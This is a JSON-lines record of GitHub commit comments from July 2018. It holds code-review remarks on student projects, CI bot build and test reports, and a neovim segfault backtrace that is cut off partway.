{"id":"8020287132","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29838441,"position":null,"line":null,"path":null,"commit_id":"015edd20561a3b1eeeea89e91868299f440b9132","created_at":"2018-07-26T03:57:30Z","updated_at":"2018-07-26T03:57:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-405](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-405).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-405-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T03:57:30Z"}
{"id":"8020287140","type":"CommitCommentEvent","actor":{"login":"DanielTakeshi"},"repo":{"name":"DanielTakeshi/IL_ROS_HSR"},"payload":{"comment":{"id":29838442,"position":null,"line":null,"path":null,"commit_id":"2dd14b79b7958b3d70dcafb30da518cd3b22c1b0","created_at":"2018-07-26T03:57:30Z","updated_at":"2018-07-26T03:57:30Z","author_association":"OWNER","body":"TODO: later need to test out this a bit more, sometimes if I make minor changes the analytic script fails ... ? Try blue data, and adding more cv2 saving images..."}},"created_at":"2018-07-26T03:57:30Z"}
{"id":"8020288296","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838446,"position":68,"line":69,"path":"matrix.py","commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T03:58:01Z","updated_at":"2018-07-26T03:58:01Z","author_association":"NONE","body":"同上，錯誤訊息和運算會不合法的原因並不相同，應該可以輸出更相符的訊息。"}},"created_at":"2018-07-26T03:58:01Z"}
{"id":"8020289281","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838448,"position":38,"line":38,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T03:58:26Z","updated_at":"2018-07-26T03:58:26Z","author_association":"NONE","body":"Why have a has_next method if this is the idiom you’re using?"}},"created_at":"2018-07-26T03:58:26Z"}
{"id":"8020289984","type":"CommitCommentEvent","actor":{"login":"JustinBKinser"},"repo":{"name":"JustinBKinser/FrontEnd-5-18"},"payload":{"comment":{"id":29838452,"position":null,"line":null,"path":null,"commit_id":"d54ebc3f0ed903f12b48d5a3913205c8731dc5c2","created_at":"2018-07-26T03:58:44Z","updated_at":"2018-07-26T03:58:44Z","author_association":"OWNER","body":"Media queries, solved bug with iFrame, added notes, cleaned up code. "}},"created_at":"2018-07-26T03:58:44Z"}
{"id":"8020290358","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838453,"position":null,"line":null,"path":null,"commit_id":"8c6a38ae74be4ac99056e05742d42148e0b3206c","created_at":"2018-07-26T03:58:53Z","updated_at":"2018-07-26T03:58:53Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2943 of 2946 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c6a38ae74be4ac99056e05742d42148e0b3206c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T03:58:53Z"}
{"id":"8020292151","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838457,"position":49,"line":49,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T03:59:37Z","updated_at":"2018-07-26T03:59:37Z","author_association":"NONE","body":"Why not just return the result immediately?"}},"created_at":"2018-07-26T03:59:37Z"}
{"id":"8020292869","type":"CommitCommentEvent","actor":{"login":"bluesquarez"},"repo":{"name":"bluesquarez/DemoGIT"},"payload":{"comment":{"id":29838458,"position":null,"line":null,"path":null,"commit_id":"2e225c770821a93b28fc481809b0f2848c5894e6","created_at":"2018-07-26T03:59:56Z","updated_at":"2018-07-26T03:59:56Z","author_association":"OWNER","body":"okoko"}},"created_at":"2018-07-26T03:59:56Z"}
{"id":"8020294527","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838468,"position":null,"line":null,"path":null,"commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T04:00:30Z","updated_at":"2018-07-26T04:00:30Z","author_association":"NONE","body":"幾個程式的問題：\r\n1. 在 `__init__()` constructor 中，可以將 `nrows` 和 `ncols` assign 給 instance variable，\r\n也就是 `self.nrows = nrows` 和 `self.ncols = ncols`，\r\n這樣子你在比較 matrix 長度是不是相同時(30行)，\r\n可以寫成 `if self.ncols == m.cols and self.nrows == m.nrows:`，\r\n會簡潔很多。\r\n\r\n2. 利用 deepcopy 複製的 matrix，應該是拿來操作和做運算用的，\r\n而不應該拿 `self.matrix` 來做運算，也就不會更改到 `self.matrix` 的值，\r\n因此不需要在每次做運算時，都要執行 `self.matrix=matrix_Aorg`\r\n\r\n3. 呼叫矩陣運算的 method 時，如果發現運算不合法，\r\nreturn None 就好，不需要將 matrix 改為 None\r\n\r\n"}},"created_at":"2018-07-26T04:00:30Z"}
{"id":"8020294951","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838469,"position":63,"line":63,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T04:00:40Z","updated_at":"2018-07-26T04:00:40Z","author_association":"NONE","body":"Why not just break?"}},"created_at":"2018-07-26T04:00:40Z"}
{"id":"8020298703","type":"CommitCommentEvent","actor":{"login":"6saba"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29838482,"position":2,"line":35,"path":"CODE_OF_CONDUCT.md","commit_id":"b424384af099721675f85898947f0db4588533d3","created_at":"2018-07-26T04:02:06Z","updated_at":"2018-07-26T04:02:06Z","author_association":"NONE","body":"project "}},"created_at":"2018-07-26T04:02:06Z"}
{"id":"8020300649","type":"CommitCommentEvent","actor":{"login":"6saba"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29838488,"position":2,"line":35,"path":"CODE_OF_CONDUCT.md","commit_id":"b424384af099721675f85898947f0db4588533d3","created_at":"2018-07-26T04:02:53Z","updated_at":"2018-07-26T04:02:53Z","author_association":"NONE","body":"will"}},"created_at":"2018-07-26T04:02:53Z"}
{"id":"8020300693","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838489,"position":84,"line":84,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T04:02:54Z","updated_at":"2018-07-26T04:02:54Z","author_association":"NONE","body":"No clause - does this parse?"}},"created_at":"2018-07-26T04:02:54Z"}
{"id":"8020302414","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"chuchujenny/X-Village-HW1"},"payload":{"comment":{"id":29838494,"position":null,"line":null,"path":null,"commit_id":"5a2bd03aece4f52efc7a40ee7fcc50bdc6b542b0","created_at":"2018-07-26T04:03:39Z","updated_at":"2018-07-26T04:03:39Z","author_association":"NONE","body":"我是介誠，如果妳有不清楚或有問題的地方，可以直接來問我\r\n阿也可以把我提到的幾個點 rewrite 後在 push，我會在看"}},"created_at":"2018-07-26T04:03:39Z"}
{"id":"8020307289","type":"CommitCommentEvent","actor":{"login":"kevinclark"},"repo":{"name":"donteSmall/Fundamental_data_structures"},"payload":{"comment":{"id":29838503,"position":97,"line":97,"path":"LinkedList.py","commit_id":"1d109bdb3b24b7d10cfaf47b72fb8894c46f6523","created_at":"2018-07-26T04:05:39Z","updated_at":"2018-07-26T04:05:39Z","author_association":"NONE","body":"See note about `__str__`. You shouldn’t need to do this. "}},"created_at":"2018-07-26T04:05:39Z"}
{"id":"8020308331","type":"CommitCommentEvent","actor":{"login":"epicmonkey"},"repo":{"name":"monicahq/monica"},"payload":{"comment":{"id":29838506,"position":38,"line":38,"path":"database/migrations/2018_07_08_104306_update-timestamps-timezone.php","commit_id":"f5888accd595c4b628e86f0f46195d02727e6797","created_at":"2018-07-26T04:06:04Z","updated_at":"2018-07-26T04:06:04Z","author_association":"NONE","body":"This migration does not look right (copy-paste from `update` method below?), shouldn't it be: ```DB::table('contacts')->where('id', $model->$id)```?"}},"created_at":"2018-07-26T04:06:04Z"}
{"id":"8020309357","type":"CommitCommentEvent","actor":{"login":"peter-android"},"repo":{"name":"peter-android/hello-world"},"payload":{"comment":{"id":29838507,"position":null,"line":null,"path":null,"commit_id":"403047a91188dc4a13465b5cd1d8b68ad521c7fd","created_at":"2018-07-26T04:06:27Z","updated_at":"2018-07-26T04:06:27Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-26T04:06:27Z"}
{"id":"8020311428","type":"CommitCommentEvent","actor":{"login":"Marcade80"},"repo":{"name":"HermanRonk/Clickfarm"},"payload":{"comment":{"id":29838513,"position":null,"line":null,"path":null,"commit_id":"a9a75d9ff61b92aab9481545c4895f468ae233e4","created_at":"2018-07-26T04:07:20Z","updated_at":"2018-07-26T04:07:20Z","author_association":"CONTRIBUTOR","body":"Suggestie; sinds je (denk ik) meer met de backend gaat doen (market) en de PHP files hier toch staan, mss. handig om een SQL Export (vrij eenvoudig in PHPMyAdmin) van de database struktuur te maken en die ook in GIT in te checken zodat anderen die database struktuur kunnen importeren?"}},"created_at":"2018-07-26T04:07:20Z"}
{"id":"8020313498","type":"CommitCommentEvent","actor":{"login":"omararanda"},"repo":{"name":"omararanda/hello-world"},"payload":{"comment":{"id":29838518,"position":null,"line":null,"path":null,"commit_id":"4b4a1e0448486db4d75158a34c9e1f7f7053fa11","created_at":"2018-07-26T04:08:17Z","updated_at":"2018-07-26T04:08:17Z","author_association":"OWNER","body":"What is this?, is this your collaboration????"}},"created_at":"2018-07-26T04:08:17Z"}
{"id":"8020317614","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29838527,"position":null,"line":null,"path":null,"commit_id":"998c6494b286e3f308ecc7c3231a9389e7149eda","created_at":"2018-07-26T04:10:06Z","updated_at":"2018-07-26T04:10:06Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-406](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-406).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-406-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T04:10:06Z"}
{"id":"8020318147","type":"CommitCommentEvent","actor":{"login":"qbert2k"},"repo":{"name":"GluuFederation/oxAuth"},"payload":{"comment":{"id":29838531,"position":null,"line":null,"path":null,"commit_id":"6c66b8788e3da999da75f13104e4cb608383ff61","created_at":"2018-07-26T04:10:18Z","updated_at":"2018-07-26T04:10:18Z","author_association":"CONTRIBUTOR","body":"oxAuth #851"}},"created_at":"2018-07-26T04:10:18Z"}
{"id":"8020325692","type":"CommitCommentEvent","actor":{"login":"indianprogrammer"},"repo":{"name":"indianprogrammer/navyug_school"},"payload":{"comment":{"id":29838548,"position":5,"line":30,"path":"application/modules/attendance/views/studentList.php","commit_id":"8e7e03b18fdba9fc7b7d83cab6c2acc880ffdafe","created_at":"2018-07-26T04:13:28Z","updated_at":"2018-07-26T04:13:28Z","author_association":"OWNER","body":"it can be foreach($students as $student)"}},"created_at":"2018-07-26T04:13:28Z"}
{"id":"8020325928","type":"CommitCommentEvent","actor":{"login":"tfoote"},"repo":{"name":"neufieldrobotics/rosdistro"},"payload":{"comment":{"id":29838550,"position":null,"line":null,"path":null,"commit_id":"b3be2d483debb62bee321604ae5746508a554cd1","created_at":"2018-07-26T04:13:34Z","updated_at":"2018-07-26T04:13:34Z","author_association":"NONE","body":"Thanks @toote "}},"created_at":"2018-07-26T04:13:34Z"}
{"id":"8020326742","type":"CommitCommentEvent","actor":{"login":"ahanafy91"},"repo":{"name":"ahanafy91/amazon-ec2-user-guide-windows"},"payload":{"comment":{"id":29838554,"position":106,"line":81,"path":"doc_source/troubleshooting-windows-instances.md","commit_id":"7ea6181eacd636e9de3dd11f5d40c9896a11b84e","created_at":"2018-07-26T04:13:55Z","updated_at":"2018-07-26T04:13:55Z","author_association":"OWNER","body":"Please make the Manual Steps section collapsible and indented under the \"Verify that Windows firewall..\" step."}},"created_at":"2018-07-26T04:13:55Z"}
{"id":"8020326777","type":"CommitCommentEvent","actor":{"login":"officeplayer"},"repo":{"name":"tamlok/vnote"},"payload":{"comment":{"id":29838555,"position":null,"line":null,"path":null,"commit_id":"6ab85e1c1ca1d18b75439cd724b3f15e7b78c359","created_at":"2018-07-26T04:13:56Z","updated_at":"2018-07-26T04:13:56Z","author_association":"NONE","body":"不会编程看不懂，但是感谢作者积极回应"}},"created_at":"2018-07-26T04:13:56Z"}
{"id":"8020332313","type":"CommitCommentEvent","actor":{"login":"njxjackson87"},"repo":{"name":"creativecommons/policies"},"payload":{"comment":{"id":29838566,"position":null,"line":null,"path":null,"commit_id":"77504d99bfd0e5b57d3cf76ffb5a33e8e6e4c82b","created_at":"2018-07-26T04:16:13Z","updated_at":"2018-07-26T04:16:13Z","author_association":"NONE","body":"Good "}},"created_at":"2018-07-26T04:16:13Z"}
{"id":"8020338658","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"tpruvot/cpuminer-multi"},"payload":{"comment":{"id":29838575,"position":null,"line":null,"path":null,"commit_id":"9fff60e7abf1c7beb64f7029ac2cff085c8c8494","created_at":"2018-07-26T04:18:59Z","updated_at":"2018-07-26T04:18:59Z","author_association":"NONE","body":"9fff60e"}},"created_at":"2018-07-26T04:18:59Z"}
{"id":"8020338934","type":"CommitCommentEvent","actor":{"login":"anhtuan1988"},"repo":{"name":"bitpay/copay"},"payload":{"comment":{"id":29838576,"position":5,"line":11,"path":"src/providers/action-sheet/action-sheet.ts","commit_id":"6570b0316c1bd2e23f291e4796b00af3c20c2b22","created_at":"2018-07-26T04:19:07Z","updated_at":"2018-07-26T04:19:07Z","author_association":"NONE","body":"50000000"}},"created_at":"2018-07-26T04:19:07Z"}
{"id":"8020341195","type":"CommitCommentEvent","actor":{"login":"rabutler-usbr"},"repo":{"name":"r-lib/remotes"},"payload":{"comment":{"id":29838577,"position":null,"line":null,"path":null,"commit_id":"d3a6766c0bcb456b82a0b06608f6149fe4f5d83e","created_at":"2018-07-26T04:20:09Z","updated_at":"2018-07-26T04:20:09Z","author_association":"NONE","body":"Agreed, this is a huge help and would be great to have it available on CRAN. It will allow AppVeyor to work with `PKGTYPE: both`. Thanks!"}},"created_at":"2018-07-26T04:20:09Z"}
{"id":"8020342230","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"tpruvot/cpuminer-multi"},"payload":{"comment":{"id":29838581,"position":null,"line":null,"path":null,"commit_id":"b57797c24996382a3c5f430ec5c5fed5a358136e","created_at":"2018-07-26T04:20:35Z","updated_at":"2018-07-26T04:20:35Z","author_association":"NONE","body":"b57797c"}},"created_at":"2018-07-26T04:20:35Z"}
{"id":"8020342843","type":"CommitCommentEvent","actor":{"login":"tutu9706"},"repo":{"name":"tutu9706/2018.7.26"},"payload":{"comment":{"id":29838583,"position":null,"line":null,"path":null,"commit_id":"43ff9242a7418280ca497c9eb308533d50e71175","created_at":"2018-07-26T04:20:50Z","updated_at":"2018-07-26T04:20:50Z","author_association":"OWNER","body":"aaaaa"}},"created_at":"2018-07-26T04:20:50Z"}
{"id":"8020342923","type":"CommitCommentEvent","actor":{"login":"FavourAmayo"},"repo":{"name":"BakoJS/Feud-Quiz"},"payload":{"comment":{"id":29838584,"position":null,"line":null,"path":null,"commit_id":"be4a1ac838c3777f6e02c43ee26646205bd2e77f","created_at":"2018-07-26T04:20:52Z","updated_at":"2018-07-26T04:20:52Z","author_association":"CONTRIBUTOR","body":"Source folder"}},"created_at":"2018-07-26T04:20:52Z"}
{"id":"8020364172","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29838637,"position":null,"line":null,"path":null,"commit_id":"3232f9081c022f550e6d0a7319fa27fc3c570f87","created_at":"2018-07-26T04:29:59Z","updated_at":"2018-07-26T04:29:59Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-408](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-408).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-408-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-26T04:29:59Z"}
{"id":"8020366142","type":"CommitCommentEvent","actor":{"login":"hokasu"},"repo":{"name":"Zarxrax/NetflixSubs"},"payload":{"comment":{"id":29838643,"position":null,"line":null,"path":null,"commit_id":"80c8614a937b1ed11746915748bf040019522aa9","created_at":"2018-07-26T04:30:48Z","updated_at":"2018-07-26T04:30:48Z","author_association":"NONE","body":"I wasn't prompted to install InputStream or WideVine. Videos aren't loading for me but I don't know where the log file is to check whats going on. Maybe include that information in the readme?"}},"created_at":"2018-07-26T04:30:48Z"}
{"id":"8020367816","type":"CommitCommentEvent","actor":{"login":"arigold24k"},"repo":{"name":"arigold24k/hangman2"},"payload":{"comment":{"id":29838644,"position":null,"line":null,"path":null,"commit_id":"1ed1facb1e8c0920ceafd1554092209eabc2105a","created_at":"2018-07-26T04:31:31Z","updated_at":"2018-07-26T04:31:31Z","author_association":"OWNER","body":"Final Commit"}},"created_at":"2018-07-26T04:31:31Z"}
{"id":"8020370846","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29838648,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-26T04:32:52Z","updated_at":"2018-07-26T04:32:52Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - i386-Windows-7-VisualStudio-14: OK (2932 of 2948 tests passed, 21 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 26 tests had: EIO diffs.\n * 12 tests had: ESO small diffs.\n * 8 tests had: MTR small diffs.\n * 9 tests had: Table small diffs.\n * 4 tests had: ERR diffs.\n * 14 tests had: ESO big diffs.\n * 15 tests had: Table big diffs.\n * 9 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 607\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.46%25-yellow.png)</a> \n"}},"created_at":"2018-07-26T04:32:52Z"}
{"id":"8020382184","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29838671,"position":null,"line":null,"path":null,"commit_id":"ad23c9ef2357081c0c764016638776e60bb210ad","created_at":"2018-07-26T04:37:48Z","updated_at":"2018-07-26T04:37:48Z","author_association":"NONE","body":"~sticks and stones might ruin a sprite but balance will still be as broken~"}},"created_at":"2018-07-26T04:37:48Z"}
{"id":"8020384389","type":"CommitCommentEvent","actor":{"login":"hideyama-sunwolves"},"repo":{"name":"hideyama-sunwolves/assessment"},"payload":{"comment":{"id":29838678,"position":null,"line":null,"path":null,"commit_id":"4c85ad1164713db864ef9808ce2714ece4d14d32","created_at":"2018-07-26T04:38:45Z","updated_at":"2018-07-26T04:38:45Z","author_association":"OWNER","body":"4c85ad1"}},"created_at":"2018-07-26T04:38:45Z"}
{"id":"8020397501","type":"CommitCommentEvent","actor":{"login":"vladtrebukhov"},"repo":{"name":"vladtrebukhov/matchingmemorygame"},"payload":{"comment":{"id":29838697,"position":null,"line":null,"path":null,"commit_id":"39364880648cbe6f22838613d3a4b1835bfaf3b8","created_at":"2018-07-26T04:44:20Z","updated_at":"2018-07-26T04:44:20Z","author_association":"OWNER","body":"Lines 83-84 are currently bugged. Although each card cant be selected twice, the section element is still able to be selected once, adding to the click counter and adding the hidden class to the whole grid if counter increases to 2. Last bug (hopefully) that will need fixing. \r\n"}},"created_at":"2018-07-26T04:44:20Z"}
{"id":"8020401586","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838704,"position":13,"line":7,"path":"matrix.py","commit_id":"2dd53b3dd3f703d0faa2768799463041a921f3e6","created_at":"2018-07-26T04:46:08Z","updated_at":"2018-07-26T04:46:08Z","author_association":"NONE","body":"變數的命名可以有意義一點，\r\nbtw, 這個 List Comprehension 的寫法很厲害 :+1: \r\n"}},"created_at":"2018-07-26T04:46:08Z"}
{"id":"8020403723","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838707,"position":19,"line":12,"path":"matrix.py","commit_id":"2dd53b3dd3f703d0faa2768799463041a921f3e6","created_at":"2018-07-26T04:46:59Z","updated_at":"2018-07-26T04:46:59Z","author_association":"NONE","body":"同上，變數的命名可以更好"}},"created_at":"2018-07-26T04:46:59Z"}
{"id":"8020411605","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29838718,"position":null,"line":null,"path":null,"commit_id":"2b92aeea905ed59efaa4e7f11735ba033f42d202","created_at":"2018-07-26T04:50:26Z","updated_at":"2018-07-26T04:50:26Z","author_association":"OWNER","body":"A bool should be a fair amount faster than a popcount, so it seems like a simplification to me.  There are 1/2 dozen candidates for this kind of simplification, however, before I do the others, could others give their opinion whether this is a simplification?"}},"created_at":"2018-07-26T04:50:26Z"}
{"id":"8020412935","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/purpleteam"},"payload":{"comment":{"id":29838731,"position":null,"line":null,"path":null,"commit_id":"7f5d9e3432326290ef50fbbed9f1f449aa2ae3f8","created_at":"2018-07-26T04:51:01Z","updated_at":"2018-07-26T04:51:01Z","author_association":"OWNER","body":"Address #5 and #6 "}},"created_at":"2018-07-26T04:51:01Z"}
{"id":"8020413978","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"I24046025/X-Village-HW1"},"payload":{"comment":{"id":29838738,"position":63,"line":50,"path":"matrix.py","commit_id":"2dd53b3dd3f703d0faa2768799463041a921f3e6","created_at":"2018-07-26T04:51:29Z","updated_at":"2018-07-26T04:51:29Z","author_association":"NONE","body":"這種字串格式化的方法是比較舅的 style，\r\n現在一般會使用 `format`\r\nhttps://docs.python.org/3/library/stdtypes.html#str.format"}},"created_at":"2018-07-26T04:51:29Z"}
{"id":"8020416939","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29838741,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-26T04:52:48Z","updated_at":"2018-07-26T04:52:48Z","author_association":"NONE","body":"I just worked out that I can generate luts from ICIO plugin in either .3dl .csp .cub .icc .itx or .lut formats.\r\n\r\nThe following are the to and from colourspaces that can be made into a lut to transfer between each other. Would any of these be beneficial for me to generate for you @masc4ii ? I'm looking specifically at the Linear REC709 to Cinelog-C. But let me know of any combinations you could benefit from and I can send them over. Just let me know the best extension to put them into.\r\n\r\n<img width=\"353\" alt=\"screen shot 2018-07-26 at 2 39 13 pm\" src=\"https://user-images.githubusercontent.com/15124133/43242254-483eb556-90e3-11e8-80f6-15074e412f90.png\">\r\n<img width=\"338\" alt=\"screen shot 2018-07-26 at 2 38 41 pm\" src=\"https://user-images.githubusercontent.com/15124133/43242255-487d37a4-90e3-11e8-9c06-1fc2a69821a9.png\">"}},"created_at":"2018-07-26T04:52:48Z"}
{"id":"8020419780","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29838744,"position":null,"line":null,"path":null,"commit_id":"989b585e105b4f343f639abf5daf820de19d4a26","created_at":"2018-07-26T04:53:59Z","updated_at":"2018-07-26T04:53:59Z","author_association":"CONTRIBUTOR","body":"@bfredl \r\nThis commit causes a segfault for me, when opening the location list with errors in Neomake, where Neomake then adds signs in the location list:\r\n\r\n```\r\n#0  0x000055dffe809307 in win_line (wp=0x7fa5aecf3000, lnum=1, startrow=0, endrow=2, \r\n    nochange=false) at ../src/nvim/screen.c:2417\r\n#1  0x000055dffe80618b in win_update (wp=0x7fa5aecf3000) at ../src/nvim/screen.c:1427\r\n#2  0x000055dffe803c2e in update_debug_sign (buf=0x7fa5ae6e1000, lnum=1)\r\n    at ../src/nvim/screen.c:581\r\n#3  0x000055dffe6d6c1a in ex_sign (eap=0x7ffee7533f30) at ../src/nvim/ex_cmds.c:5862\r\n#4  0x000055dffe6e59b9 in do_one_cmd (cmdlinep=0x7ffee7534130, flags=3, \r\n    cstack=0x7ffee7534240, fgetline=0x55dffe6e2d08 <get_loop_line>, cookie=0x7ffee7534b70)\r\n    at ../src/nvim/ex_docmd.c:2228\r\n#5  0x000055dffe6e207f in do_cmdline (\r\n    cmdline=0x7fa5ae5fefa0 \"sign place 5000 line=1 name=neomake_file_warn buffer=8\", \r\n    fgetline=0x55dffe6e2d08 <get_loop_line>, cookie=0x7ffee7534b70, flags=3)\r\n    at ../src/nvim/ex_docmd.c:592\r\n#6  0x000055dffe6a465a in ex_execute (eap=0x7ffee75348c0) at ../src/nvim/eval.c:19533\r\n#7  0x000055dffe6e59b9 in do_one_cmd (cmdlinep=0x7ffee7534ac0, flags=7, \r\n    cstack=0x7ffee7534bd0, fgetline=0x55dffe6e2d08 <get_loop_line>, cookie=0x7ffee7534b70)\r\n    at ../src/nvim/ex_docmd.c:2228\r\n#8  0x000055dffe6e207f in do_cmdline (cmdline=0x0, fgetline=0x55dffe6aa25f <get_func_line>, \r\n    cookie=0x7fa5aea28800, flags=7) at ../src/nvim/ex_docmd.c:592\r\n#9  0x000055dffe6a946d in call_user_func (fp=0x7fa5ae68f440, argcount=3, \r\n    argvars=0x7ffee7535770, rettv=0x7ffee7535950, firstline=1, lastline=1, selfdict=0x0)\r\n    at ../src/nvim/eval.c:21397\r\n#10 0x000055dffe684f02 in call_func (funcname=0x7fa5ae5e5880 \"neomake#signs#PlaceSigns\", \r\n    len=24, rettv=0x7ffee7535950, argcount_in=3, argvars_in=0x7ffee7535770, argv_func=0x0, \r\n    firstline=1, lastline=1, doesrange=0x7ffee753591c, evaluate=true, partial=0x0, \r\n    selfdict_in=0x0) at ../src/nvim/eval.c:6353\r\n#11 0x000055dffe6845eb in get_func_tv (name=0x7fa5ae5e5880 \"neomake#signs#PlaceSigns\", \r\n    len=24, rettv=0x7ffee7535950, arg=0x7ffee7535920, firstline=1, lastline=1, \r\n    doesrange=0x7ffee753591c, evaluate=1, partial=0x0, selfdict=0x0)\r\n    at ../src/nvim/eval.c:6114\r\n#12 0x000055dffe67c61b in ex_call (eap=0x7ffee7535a80) at ../src/nvim/eval.c:2727\r\n#13 0x000055dffe6e59b9 in do_one_cmd (cmdlinep=0x7ffee7535c80, flags=7, \r\n    cstack=0x7ffee7535d90, fgetline=0x55dffe6aa25f <get_func_line>, cookie=0x7fa5aea28000)\r\n    at ../src/nvim/ex_docmd.c:2228\r\n#14 0x000055dffe6e207f in do_cmdline (cmdline=0x0, fgetline=0x55dffe6aa25f <get_func_line>, \r\n    cookie=0x7fa5aea28000, flags=7) at ../src/nvim/ex_docmd.c:592\r\n#15 0x000055dffe6a946d in call_user_func (fp=0x7fa5af4548a0, argcount=0, \r\n    argvars=0x7ffee7536930, rettv=0x7ffee7536b10, firstline=1, lastline=1, selfdict=0x0)\r\n    at ../src/nvim/eval.c:21397\r\n#16 0x000055dffe684f02 in call_func (\r\n    funcname=0x7fa5ae5e5ac0 \"neomake#quickfix#FormatQuickfix\", len=31, \r\n    rettv=0x7ffee7536b10, argcount_in=0, argvars_in=0x7ffee7536930, argv_func=0x0, \r\n    firstline=1, lastline=1, doesrange=0x7ffee7536adc, evaluate=true, partial=0x0, \r\n    selfdict_in=0x0) at ../src/nvim/eval.c:6353\r\n#17 0x000055dffe6845eb in 